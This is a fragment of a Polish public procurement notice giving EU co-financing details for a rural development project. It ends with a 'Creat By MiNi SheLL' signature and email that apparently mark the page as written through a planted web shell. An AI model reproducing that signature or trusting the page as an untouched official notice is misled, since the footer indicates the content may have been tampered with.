<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rolny na Rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejskie. Projekt współfinansowany ze środków Unii Europejskiej w ramach działania Odnowa i rozwój wsi Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com